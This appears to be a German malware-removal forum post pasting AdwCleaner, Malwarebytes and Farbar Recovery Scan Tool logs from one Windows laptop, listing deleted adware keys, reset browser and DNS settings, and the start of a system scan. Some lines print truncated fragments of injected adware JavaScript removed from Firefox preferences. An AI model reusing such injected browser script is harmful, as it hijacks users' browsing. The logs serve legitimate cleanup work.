[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B0A28F54-B08F-4049-A9BF-8D33BD1E9222}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68B81CCD-A80C-4060-8947-5AE69ED01199}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{93DBF2BB-A2B3-4683-A92E-57E60751F346}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E6B969FB-6D33-48D2-9061-8BBD4899EB08}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{56561B2A-FB5D-363A-9631-4C03D6054209}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{A717364F-69F3-3A24-ADD5-3901A57F880E}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{CCB08265-B35D-30B2-A6AF-6986CA957358}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{CD92622E-49B9-33B7-98D1-EC51049457D7}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{E041E037-FA4B-364A-B440-7A1051EA0301}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{2BEF239C-752E-4001-8048-F256E0D8CD93}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{49C00A51-6E59-41FE-B3FA-2D2157FAD67B}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{6DFF5DBA-AE3A-46DB-B301-ECFFC6DB2982}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{DE34CD67-F1C8-4001-9A23-B8A68F63F377}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{88C20E16-1EB7-40CE-820C-6CFCB41B1D2F}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{41634761-D0BA-4C1A-9AC2-04AEE9511370}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{93DBF2BB-A2B3-4683-A92E-57E60751F346}
[-] Schlüssel Gelöscht : HKCU\Software\1ClickDownload
[-] Schlüssel Gelöscht : HKCU\Software\Boost
[-] Schlüssel Gelöscht : HKCU\Software\ClickConnect
[-] Schlüssel Gelöscht : HKCU\Software\Conduit
[-] Schlüssel Gelöscht : HKCU\Software\GlobalUpdate
[-] Schlüssel Gelöscht : HKCU\Software\InstallCore
[-] Schlüssel Gelöscht : HKCU\Software\OCS
[-] Schlüssel Gelöscht : HKCU\Software\SearchProtectINT
[-] Schlüssel Gelöscht : HKCU\Software\SweetIM
[-] Schlüssel Gelöscht : HKCU\Software\UpdaterEX
[-] Schlüssel Gelöscht : HKCU\Software\Reimage
[-] Schlüssel Gelöscht : HKCU\Software\onekit
[-] Schlüssel Gelöscht : HKCU\Software\Super Optimizer
[-] Schlüssel Gelöscht : HKCU\Software\Binkiland Browser
[-] Schlüssel Gelöscht : HKCU\Software\Appscion
[-] Schlüssel Gelöscht : HKCU\Software\System Optimizer
[-] Schlüssel Gelöscht : HKCU\Software\YorkNewCin
[-] Schlüssel Gelöscht : HKCU\Software\HighDefAction
[-] Schlüssel Gelöscht : HKCU\Software\ArenaHD
[-] Schlüssel Gelöscht : HKCU\Software\PRODUCTSETUP
[-] Schlüssel Gelöscht : HKCU\Software\OB
[-] Schlüssel Gelöscht : HKCU\Software\undefined
[-] Schlüssel Gelöscht : HKCU\Software\Crossbrowse
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Crossrider
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Savings Bull
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\AppDataLow\SOFTWARE\Crossrider
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\AppDataLow\SOFTWARE\_CrossriderRegNamePlaceHolder_
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Boost
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Conduit
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\GlobalUpdate
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\SavingsBullFilter
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\supWPM
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\SweetIM
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\sweet-pageSoftware
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Tutorials
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Uniblue
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Taronja
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\YorkNewCin
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\HighDefAction
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\WebProtector
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\ArenaHD
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Crossbrowse
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F6423EE4-93D8-FA04-D09D-A8598F6EFDFD}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Iminent
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\LevelQualityWatcher
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Reimage
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\WebBar
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\YorkNewCin
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\HighDefAction
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\ArenaHD
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\AppDataLow\Software\_CrossriderRegNamePlaceHolder_
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3152E1F19977892449DC968802CE8964
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GLOBALUPDATE.EXE
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar]
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0b4d26f6-61a8-4463-99dd-5f2fe0400fa6}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
[-] Daten Wiederhergestellt : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0} [NameServer]
***** [ Internetbrowser ] *****
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.I27nhBqrnTmK9ZBi.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\"[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.OrM348BI7ONz6x3I.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"livewebcams.xyz\",\"secure.dditserv[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.QZ2PfaZcGfDrlj43.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"livewebcams.xyz\",\"secure.dditserv[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.THC6eL302GRxEmrT.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"livewebcams.xyz\",\"search.asistent[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.ZgIRlvn8PSaHQSKH.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.crossrider.bic", "14d819805d0db272fdbdb086ef894caa");
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.hdpQ86YFIHYbEFBP.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\"[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.k0biZPvjPSaodpcg.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\"[...]
[-] [C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Gelöscht : kfecnpmgnlnbmipaogfhoacoioifjgko
*************************
:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Chrome Richtlinien gelöscht
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [37794 Bytes] ########## --- --- ---
Inhalt von MBAM.txt
Malwarebytes Anti-Malware
www.malwarebytes.org
Scan, 22.12.2015 00:16, SYSTEM, EASYNOTE, Manual, Start: 21.12.2015 23:26, Dauer: 41 Min. 22 Sek., Bedrohungssuchlauf, Abgeschlossen, 0 Malware-Erkennung, 1001 Nicht-Malware-Erkennungen,
Error, 22.12.2015 00:22, SYSTEM, EASYNOTE, Protection, IsLicensed, 13,
Protection, 22.12.2015 00:22, SYSTEM, EASYNOTE, Protection, Malware Protection, Stopping,
Protection, 22.12.2015 00:22, SYSTEM, EASYNOTE, Protection, Malware Protection, Stopped,
(end) Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:20-12-2015
durchgeführt von Özkan (Administrator) auf EASYNOTE (22-12-2015 01:23:03)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Geladene Profile: Özkan (Verfügbare Profile: Özkan & Gast)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_WT50RP.EXE
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMutilps32.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-27] (Realtek Semiconductor)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2821936 2012-03-07] (ELAN Microelectronics Corp.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {1c281590-2b6f-11e3-b71b-b888e3cf1a37} - E:\LGAutoRun.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6b7e0915-f87b-11e2-9524-806e6f6e6963} - D:\AutoRun\AutoRunX\AutoRunX.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6dccb73b-6b4e-11e3-accd-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {720267d0-76b1-11e3-8f9d-b888e3cf1a37} - F:\SETUP.EXE
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {81dd1ca2-40b4-11e4-893b-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {85a61aa3-6a20-11e3-a24a-b888e3cf1a37} - E:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ACHTUNG
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\avsinit.vbs [2014-12-15] ()
CHR HKU\S-1-5-21-1539430812-113463742-2149372525-1000\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 80.69.100.212 80.69.100.205
Tcpip\..\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0}: [DhcpNameServer] 80.69.100.212 80.69.100.205
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKLM-x32 -> Standard = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
SearchScopes: HKLM -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL =
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> URL hxxp://search.conduit.com/Results.aspx?gd=&ctid=CT3317933&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=58&CUI=&UM=5&UP=SP1188471C-B9E3-4D82-BAC1-E62C126C7D6E&q={searchTerms}&SSPV=
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652
FF Homepage: google.de
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-09] ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-10-12] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-10-12] (Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1203133.dll [2013-06-26] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @ngm.nexoneu.com/NxGame -> C:\ProgramData\NexonEU\NGM\npNxGameEU.dll [2015-08-04] (Nexon)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\Özkan\Documents\my games\PB\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1539430812-113463742-2149372525-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Özkan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF Extension: Adblock Plus Pop-up Addon - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\extensions\adblockpopups@jessehakanen.net.xpi [2015-12-08]
FF Extension: Adblock Plus - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-12-15]
FF HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\m4d0ej0b.default\extensions\cliqz@cliqz.com => nicht gefunden
Chrome:
=======
CHR Profile: C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-08]
CHR Extension: (Google Docs) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-08]
CHR Extension: (Google Drive) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-08]
CHR Extension: (YouTube) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-08]
CHR Extension: (Adblock Plus) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-12-08]
